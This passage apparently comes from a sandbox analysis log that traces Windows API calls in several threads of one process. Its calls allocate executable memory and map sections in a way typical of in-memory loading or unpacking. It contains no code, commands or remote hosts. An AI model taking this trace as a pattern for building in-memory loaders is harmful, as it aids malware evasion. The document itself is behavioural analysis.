flAllocationType=0x1000, flProtect=0x4) returned 0x2936000 [0231.195] GetLastError () returned 0x1e7 [0231.195] SetLastError (dwErrCode=0x1e7) [0231.195] GetLastError () returned 0x1e7 [0231.195] SetLastError (dwErrCode=0x1e7) [0231.195] GetLastError () returned 0x1e7 [0231.195] SetLastError (dwErrCode=0x1e7) [0231.195] GetLastError () returned 0x1e7 [0231.195] SetLastError (dwErrCode=0x1e7) [0231.195] VirtualProtect (in: lpAddress=0x2911000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x24af808 | out: lpflOldProtect=0x24af808*=0x4) returned 1 [0231.199] GetLastError () returned 0x1e7 [0231.199] SetLastError (dwErrCode=0x1e7) [0231.199] GetLastError () returned 0x1e7 [0231.199] SetLastError (dwErrCode=0x1e7) [0231.199] GetLastError () returned 0x1e7 [0231.199] SetLastError (dwErrCode=0x1e7) [0231.199] VirtualProtect (in: lpAddress=0x2934000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x24af808 | out: lpflOldProtect=0x24af808*=0x4) returned 1 [0231.199] GetLastError () returned 0x1e7 [0231.199] SetLastError (dwErrCode=0x1e7) [0231.199] GetLastError () returned 0x1e7 [0231.199] SetLastError (dwErrCode=0x1e7) [0231.199] GetLastError () returned 0x1e7 [0231.200] SetLastError (dwErrCode=0x1e7) [0231.200] VirtualProtect (in: lpAddress=0x2935000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x24af808 | out: lpflOldProtect=0x24af808*=0x4) returned 1 [0231.200] GetLastError () returned 0x1e7 [0231.200] SetLastError (dwErrCode=0x1e7) [0231.200] GetLastError () returned 0x1e7 [0231.200] SetLastError (dwErrCode=0x1e7) [0231.200] GetLastError () returned 0x1e7 [0231.200] SetLastError (dwErrCode=0x1e7) [0231.200] VirtualFree (lpAddress=0x2936000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0231.203] GetLastError () returned 0x1e7 [0231.203] SetLastError (dwErrCode=0x1e7) [0231.203] GetLastError () returned 0x1e7 [0231.203] SetLastError (dwErrCode=0x1e7) [0231.203] GetLastError () returned 0x1e7 [0231.203] SetLastError (dwErrCode=0x1e7) Thread: id = 104 os_tid = 0xe54 [0156.750] malloc (_Size=0x5f5e100) returned 0x2790020 [0159.703] atoi (_Str="64") returned 64 [0159.703] atoi (_Str="8192") returned 8192 [0159.703] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x22d0000 [0159.707] malloc (_Size=0x3afd) returned 0x2041608 [0159.708] malloc (_Size=0x3afd) returned 0x2045110 [0159.736] GetLastError () returned 0x0 [0159.736] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0159.737] GetCurrentThreadId () returned 0xe54 [0159.737] calloc (_Count=0x1, _Size=0xc0) returned 0x3ad9d0 [0159.737] GetCurrentThreadId () returned 0xe54 [0159.737] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0159.737] GetCurrentThreadId () returned 0xe54 [0159.737] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x30c [0159.737] GetCurrentProcess () returned 0xffffffff [0159.737] GetCurrentThread () returned 0xfffffffe [0159.737] GetCurrentProcess () returned 0xffffffff [0159.737] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3ad9e4, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3ad9e4*=0x308) returned 1 [0159.738] GetThreadPriority (hThread=0x308) returned 0 [0159.738] SetLastError (dwErrCode=0x0) [0159.738] GetLastError () returned 0x0 [0159.738] realloc (_Block=0x0, _Size=0x4) returned 0x3a2ce8 [0159.738] realloc (_Block=0x0, _Size=0x1) returned 0x3a2cf8 [0159.738] SetLastError (dwErrCode=0x0) [0159.738] GetNativeSystemInfo (in: lpSystemInfo=0x278f4e4 | out: lpSystemInfo=0x278f4e4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0159.738] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0159.738] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2390000 [0159.739] GetProcessHeap () returned 0x530000 [0159.739] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x5a6fc0 [0159.739] VirtualAlloc (lpAddress=0x2390000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2390000 [0159.739] VirtualAlloc (lpAddress=0x2391000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2391000 [0159.742] VirtualAlloc (lpAddress=0x23b4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x23b4000 [0159.742] VirtualAlloc (lpAddress=0x23b5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x23b5000 [0159.743] VirtualAlloc (lpAddress=0x23b6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x23b6000 [0159.743] GetLastError () returned 0x1e7 [0159.743] SetLastError (dwErrCode=0x1e7) [0159.743] GetLastError () returned 0x1e7 [0159.743] SetLastError (dwErrCode=0x1e7) [0159.743] GetLastError () returned 0x1e7 [0159.743] SetLastError (dwErrCode=0x1e7) [0159.743] GetLastError () returned 0x1e7 [0159.743] SetLastError (dwErrCode=0x1e7) [0159.743] VirtualProtect (in: lpAddress=0x2391000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x278f3bc | out: lpflOldProtect=0x278f3bc*=0x4) returned 1 [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] VirtualProtect (in: lpAddress=0x23b4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x278f3bc | out: lpflOldProtect=0x278f3bc*=0x4) returned 1 [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] VirtualProtect (in: lpAddress=0x23b5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x278f3bc | out: lpflOldProtect=0x278f3bc*=0x4) returned 1 [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] GetLastError () returned 0x1e7 [0159.748] SetLastError (dwErrCode=0x1e7) [0159.748] GetLastError () returned 0x1e7 [0159.749] SetLastError (dwErrCode=0x1e7) [0159.749] VirtualFree (lpAddress=0x23b6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0159.751] GetLastError () returned 0x1e7 [0159.751] SetLastError (dwErrCode=0x1e7) [0159.751] GetLastError () returned 0x1e7 [0159.751] SetLastError (dwErrCode=0x1e7) [0159.751] GetLastError () returned 0x1e7 [0159.751] SetLastError (dwErrCode=0x1e7) Thread: id = 105 os_tid = 0xe58 [0159.792] malloc (_Size=0x5f5e100) returned 0x2970020 [0163.614] atoi (_Str="64") returned 64 [0163.614] atoi (_Str="8192") returned 8192 [0163.614] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x23c0000 [0163.617] malloc (_Size=0x3afd) returned 0x2048c18 [0163.618] malloc (_Size=0x3afd) returned 0x204c720 [0163.627] GetLastError () returned 0x0 [0163.627] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0163.628] GetCurrentThreadId () returned 0xe58 [0163.628] calloc (_Count=0x1, _Size=0xc0) returned 0x3adcb8 [0163.628] GetCurrentThreadId () returned 0xe58 [0163.628] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0163.628] GetCurrentThreadId () returned 0xe58 [0163.628] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340 [0163.628] GetCurrentProcess () returned 0xffffffff [0163.628] GetCurrentThread () returned 0xfffffffe [0163.628] GetCurrentProcess () returned 0xffffffff [0163.628] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3adccc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3adccc*=0x348) returned 1 [0163.628] GetThreadPriority (hThread=0x348) returned 0 [0163.629] SetLastError (dwErrCode=0x0) [0163.629] GetLastError () returned 0x0 [0163.629] realloc (_Block=0x0, _Size=0x4) returned 0x3a2d08 [0163.629] realloc (_Block=0x0, _Size=0x1) returned 0x3a2d18 [0163.629] SetLastError (dwErrCode=0x0) [0163.629] GetNativeSystemInfo (in: lpSystemInfo=0x28df6ec | out: lpSystemInfo=0x28df6ec*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0163.629] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0163.629] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2430000 [0163.629] GetProcessHeap () returned 0x530000 [0163.629] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x5a6f00 [0163.629] VirtualAlloc (lpAddress=0x2430000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2430000 [0163.630] VirtualAlloc (lpAddress=0x2431000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2431000 [0163.634] VirtualAlloc (lpAddress=0x2454000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2454000 [0163.634] VirtualAlloc (lpAddress=0x2455000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2455000 [0163.635] VirtualAlloc (lpAddress=0x2456000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2456000 [0163.635] GetLastError () returned 0x1e7 [0163.635] SetLastError (dwErrCode=0x1e7) [0163.635] GetLastError () returned 0x1e7 [0163.635] SetLastError (dwErrCode=0x1e7) [0163.635] GetLastError () returned 0x1e7 [0163.635] SetLastError (dwErrCode=0x1e7) [0163.635] GetLastError () returned 0x1e7 [0163.635] SetLastError (dwErrCode=0x1e7) [0163.635] VirtualProtect (in: lpAddress=0x2431000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x28df5c4 | out: lpflOldProtect=0x28df5c4*=0x4) returned 1 [0163.640] GetLastError () returned 0x1e7 [0163.640] SetLastError (dwErrCode=0x1e7) [0163.640] GetLastError () returned 0x1e7 [0163.640] SetLastError (dwErrCode=0x1e7) [0163.640] GetLastError () returned 0x1e7 [0163.640] SetLastError (dwErrCode=0x1e7) [0163.640] VirtualProtect (in: lpAddress=0x2454000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x28df5c4 | out: lpflOldProtect=0x28df5c4*=0x4) returned 1 [0163.641] GetLastError () returned 0x1e7 [0163.641] SetLastError (dwErrCode=0x1e7) [0163.641] GetLastError () returned 0x1e7 [0163.641] SetLastError (dwErrCode=0x1e7) [0163.641] GetLastError () returned 0x1e7 [0163.641] SetLastError (dwErrCode=0x1e7) [0163.641] VirtualProtect (in: lpAddress=0x2455000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x28df5c4 | out: lpflOldProtect=0x28df5c4*=0x4) returned 1 [0163.641] GetLastError () returned 0x1e7 [0163.641] SetLastError (dwErrCode=0x1e7) [0163.641] GetLastError () returned 0x1e7 [0163.641] SetLastError (dwErrCode=0x1e7) [0163.641] GetLastError () returned 0x1e7 [0163.641] SetLastError (dwErrCode=0x1e7) [0163.641] VirtualFree (lpAddress=0x2456000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0163.644] GetLastError () returned 0x1e7 [0163.644] SetLastError (dwErrCode=0x1e7) [0163.644] GetLastError () returned 0x1e7 [0163.644] SetLastError (dwErrCode=0x1e7) [0163.644] GetLastError () returned 0x1e7 [0163.644] SetLastError (dwErrCode=0x1e7) [0300.900] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.900] GetCurrentThreadId () returned 0xe58 [0300.900] GetCurrentThreadId () returned 0xe58 [0300.900] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0300.900] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0300.901] GetCurrentThreadId () returned 0xe58 [0300.901] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0300.901] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0300.901] GetCurrentThreadId () returned 0xe58 [0300.901] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0300.901] CloseHandle (hObject=0x348) returned 1 [0300.901] CloseHandle (hObject=0x340) returned 1 [0300.901] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.901] GetCurrentThreadId () returned 0xe58 [0300.901] free (_Block=0x3a2d08) [0300.901] free (_Block=0x3a2d18) [0300.901] GetCurrentThreadId () returned 0xe58 [0300.901] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0300.902] malloc (_Size=0x5f5e100) returned 0x2f50020 [0302.244] free (_Block=0x2f50020) [0302.885] atoi (_Str="64") returned 64 [0302.885] atoi (_Str="8192") returned 8192 [0302.885] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2e50000 [0302.889] malloc (_Size=0x3afd) returned 0x207cf80 [0302.890] malloc (_Size=0x3afd) returned 0x2080b88 [0302.904] GetLastError () returned 0x0 [0302.904] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0302.904] GetCurrentThreadId () returned 0xe58 [0302.904] GetCurrentThreadId () returned 0xe58 [0302.904] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0302.905] GetCurrentThreadId () returned 0xe58 [0302.905] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340 [0302.905] GetCurrentProcess () returned 0xffffffff [0302.905] GetCurrentThread () returned 0xfffffffe [0302.905] GetCurrentProcess () returned 0xffffffff [0302.905] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3adccc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3adccc*=0x348) returned 1 [0302.905] GetThreadPriority (hThread=0x348) returned 0 [0302.905] SetLastError (dwErrCode=0x0) [0302.905] GetLastError () returned 0x0 [0302.905] realloc (_Block=0x0, _Size=0x4) returned 0x3a2d18 [0302.906] realloc (_Block=0x0, _Size=0x1) returned 0x3a2d08 [0302.906] SetLastError (dwErrCode=0x0) [0302.906] GetNativeSystemInfo (in: lpSystemInfo=0x28df850 | out: lpSystemInfo=0x28df850*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0302.906] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0302.906] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2e80000 [0302.907] GetProcessHeap () returned 0x530000 [0302.907] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a83960 [0302.907] VirtualAlloc (lpAddress=0x2e80000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2e80000 [0302.907] VirtualAlloc (lpAddress=0x2e81000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2e81000 [0302.911] VirtualAlloc (lpAddress=0x2ea4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x2ea4000 [0302.911] VirtualAlloc (lpAddress=0x2ea5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2ea5000 [0302.912] VirtualAlloc (lpAddress=0x2ea6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2ea6000 [0302.912] GetLastError () returned 0x1e7 [0302.912] SetLastError (dwErrCode=0x1e7) [0302.912] GetLastError () returned 0x1e7 [0302.912] SetLastError (dwErrCode=0x1e7) [0302.912] GetLastError () returned 0x1e7 [0302.912] SetLastError (dwErrCode=0x1e7) [0302.912] GetLastError () returned 0x1e7 [0302.912] SetLastError (dwErrCode=0x1e7) [0302.912] VirtualProtect (in: lpAddress=0x2e81000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x28df728 | out: lpflOldProtect=0x28df728*=0x4) returned 1 [0302.918] GetLastError () returned 0x1e7 [0302.918] SetLastError (dwErrCode=0x1e7) [0302.918] GetLastError () returned 0x1e7 [0302.918] SetLastError (dwErrCode=0x1e7) [0302.918] GetLastError () returned 0x1e7 [0302.918] SetLastError (dwErrCode=0x1e7) [0302.918] VirtualProtect (in: lpAddress=0x2ea4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x28df728 | out: lpflOldProtect=0x28df728*=0x4) returned 1 [0302.919] GetLastError () returned 0x1e7 [0302.919] SetLastError (dwErrCode=0x1e7) [0302.919] GetLastError () returned 0x1e7 [0302.919] SetLastError (dwErrCode=0x1e7) [0302.919] GetLastError () returned 0x1e7 [0302.919] SetLastError (dwErrCode=0x1e7) [0302.919] VirtualProtect (in: lpAddress=0x2ea5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x28df728 | out: lpflOldProtect=0x28df728*=0x4) returned 1 [0302.919] GetLastError () returned 0x1e7 [0302.919] SetLastError (dwErrCode=0x1e7) [0302.919] GetLastError () returned 0x1e7 [0302.919] SetLastError (dwErrCode=0x1e7) [0302.919] GetLastError () returned 0x1e7 [0302.920] SetLastError (dwErrCode=0x1e7) [0302.920] VirtualFree (lpAddress=0x2ea6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0302.923] GetLastError () returned 0x1e7 [0302.923] SetLastError (dwErrCode=0x1e7) [0302.923] GetLastError () returned 0x1e7 [0302.923] SetLastError (dwErrCode=0x1e7) [0302.923] GetLastError () returned 0x1e7 [0302.923] SetLastError (dwErrCode=0x1e7) Thread: id = 129 os_tid = 0xe70 [0163.725] malloc (_Size=0x5f5e100) returned 0x2970020 [0167.328] atoi (_Str="64") returned 64 [0167.328] atoi (_Str="8192") returned 8192 [0167.328] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x25b0000 [0167.333] malloc (_Size=0x3afd) returned 0x2050228 [0167.333] malloc (_Size=0x3afd) returned 0x2053d30 [0167.346] GetLastError () returned 0x0 [0167.346] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0167.346] GetCurrentThreadId () returned 0xe70 [0167.346] calloc (_Count=0x1, _Size=0xc0) returned 0x2057838 [0167.346] GetCurrentThreadId () returned 0xe70 [0167.346] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0167.346] GetCurrentThreadId () returned 0xe70 [0167.346] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x368 [0167.347] GetCurrentProcess () returned 0xffffffff [0167.347] GetCurrentThread () returned 0xfffffffe [0167.347] GetCurrentProcess () returned 0xffffffff [0167.347] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x205784c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x205784c*=0x36c) returned 1 [0167.347] GetThreadPriority (hThread=0x36c) returned 0 [0167.347] SetLastError (dwErrCode=0x0) [0167.347] GetLastError () returned 0x0 [0167.347] realloc (_Block=0x0, _Size=0x4) returned 0x3a2d28 [0167.347] realloc (_Block=0x0, _Size=0x1) returned 0x3a2d38 [0167.347] SetLastError (dwErrCode=0x0) [0167.347] GetNativeSystemInfo (in: lpSystemInfo=0x271f3e4 | out: lpSystemInfo=0x271f3e4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0167.347] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0167.347] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2680000 [0167.348] GetProcessHeap () returned 0x530000 [0167.348] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x5a6ec0 [0167.348] VirtualAlloc (lpAddress=0x2680000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2680000 [0167.348] VirtualAlloc (lpAddress=0x2681000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2681000 [0167.352] VirtualAlloc (lpAddress=0x26a4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x26a4000 [0167.353] VirtualAlloc (lpAddress=0x26a5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x26a5000 [0167.353] VirtualAlloc (lpAddress=0x26a6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x26a6000 [0167.353] GetLastError () returned 0x1e7 [0167.353] SetLastError (dwErrCode=0x1e7) [0167.353] GetLastError () returned 0x1e7 [0167.354] SetLastError (dwErrCode=0x1e7) [0167.354] GetLastError () returned 0x1e7 [0167.354] SetLastError (dwErrCode=0x1e7) [0167.354] GetLastError () returned 0x1e7 [0167.354] SetLastError (dwErrCode=0x1e7) [0167.354] VirtualProtect (in: lpAddress=0x2681000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x271f2bc | out: lpflOldProtect=0x271f2bc*=0x4) returned 1 [0167.378] GetLastError () returned 0x1e7 [0167.378] SetLastError (dwErrCode=0x1e7) [0167.378] GetLastError () returned 0x1e7 [0167.378] SetLastError (dwErrCode=0x1e7) [0167.378] GetLastError () returned 0x1e7 [0167.378] SetLastError (dwErrCode=0x1e7) [0167.378] VirtualProtect (in: lpAddress=0x26a4000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x271f2bc | out: lpflOldProtect=0x271f2bc*=0x4) returned 1 [0167.379] GetLastError () returned 0x1e7 [0167.379] SetLastError (dwErrCode=0x1e7) [0167.379] GetLastError () returned 0x1e7 [0167.379] SetLastError (dwErrCode=0x1e7) [0167.379] GetLastError () returned 0x1e7 [0167.379] SetLastError (dwErrCode=0x1e7) [0167.379] VirtualProtect (in: lpAddress=0x26a5000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x271f2bc | out: lpflOldProtect=0x271f2bc*=0x4) returned 1 [0167.379] GetLastError () returned 0x1e7 [0167.379] SetLastError (dwErrCode=0x1e7) [0167.379] GetLastError () returned 0x1e7 [0167.379] SetLastError (dwErrCode=0x1e7) [0167.379] GetLastError () returned 0x1e7 [0167.379] SetLastError (dwErrCode=0x1e7) [0167.380] VirtualFree (lpAddress=0x26a6000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0167.384] GetLastError () returned 0x1e7 [0167.384] SetLastError (dwErrCode=0x1e7) [0167.384] GetLastError () returned 0x1e7 [0167.384] SetLastError (dwErrCode=0x1e7) [0167.384] GetLastError () returned 0x1e7 [0167.384] SetLastError (dwErrCode=0x1e7) Thread: id = 130 os_tid = 0xe7c [0169.308] malloc (_Size=0x5f5e100) returned 0x2cb0020 [0172.156] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x23200, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x2720000 [0172.159] malloc (_Size=0x3afd) returned 0x2057b50 [0172.160] malloc (_Size=0x3afd) returned 0x205b658 [0172.174] GetLastError () returned 0x0 [0172.174] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0172.175] GetCurrentThreadId () returned 0xe7c [0172.175] calloc (_Count=0x1, _Size=0xc0) returned 0x205f160 [0172.175] GetCurrentThreadId () returned 0xe7c [0172.175] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0172.175] GetCurrentThreadId () returned 0xe7c [0172.175] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x608 [0172.176] GetCurrentProcess () returned 0xffffffff [0172.176] GetCurrentThread () returned 0xfffffffe [0172.176] GetCurrentProcess () returned 0xffffffff [0172.176] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x205f174, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x205f174*=0x610) returned 1 [0172.176] GetThreadPriority (hThread=0x610) returned 0 [0172.176] SetLastError (dwErrCode=0x0) [0172.176] GetLastError () returned 0x0 [0172.176] realloc (_Block=0x0, _Size=0x4) returned 0x3a2d48 [0172.176] realloc (_Block=0x0, _Size=0x1) returned 0x3a2d58 [0172.176] SetLastError (dwErrCode=0x0) [0172.176] GetNativeSystemInfo (in: lpSystemInfo=0x2caf87c | out: lpSystemInfo=0x2caf87c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0172.176] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x0 [0172.176] VirtualAlloc (lpAddress=0x0, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x2790000 [0172.177] GetProcessHeap () returned 0x530000 [0172.177] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x34) returned 0x2a835e0 [0172.177] VirtualAlloc (lpAddress=0x2790000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x2790000 [0172.177] VirtualAlloc (lpAddress=0x2791000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x2791000 [0172.182] VirtualAlloc (lpAddress=0x27b4000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x27b4000 [0172.183] VirtualAlloc (lpAddress=0x27b5000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x27b5000 [0172.183] VirtualAlloc (lpAddress=0x27b6000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x27b6000 [0172.184] GetLastError () returned 0x1e7 [0172.184] SetLastError (dwErrCode=0x1e7) [0172.184] GetLastError () returned 0x1e7 [0172.184] SetLastError (dwErrCode=0x1e7) [0172.184] GetLastError () returned 0x1e7 [0172.184] SetLastError (dwErrCode=0x1e7) [0172.184] GetLastError () returned 0x1e7 [0172.184] SetLastError (dwErrCode=0x1e7) [0172.184] VirtualProtect (in: lpAddress=0x2791000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x2caf754 | out: lpflOldProtect=0x2caf754*=0x4) returned 1 [0172.189] GetLastError () returned 0x1e7 [0172.189] SetLastError (dwErrCode=0x1e7) [0172.189] GetLastError () 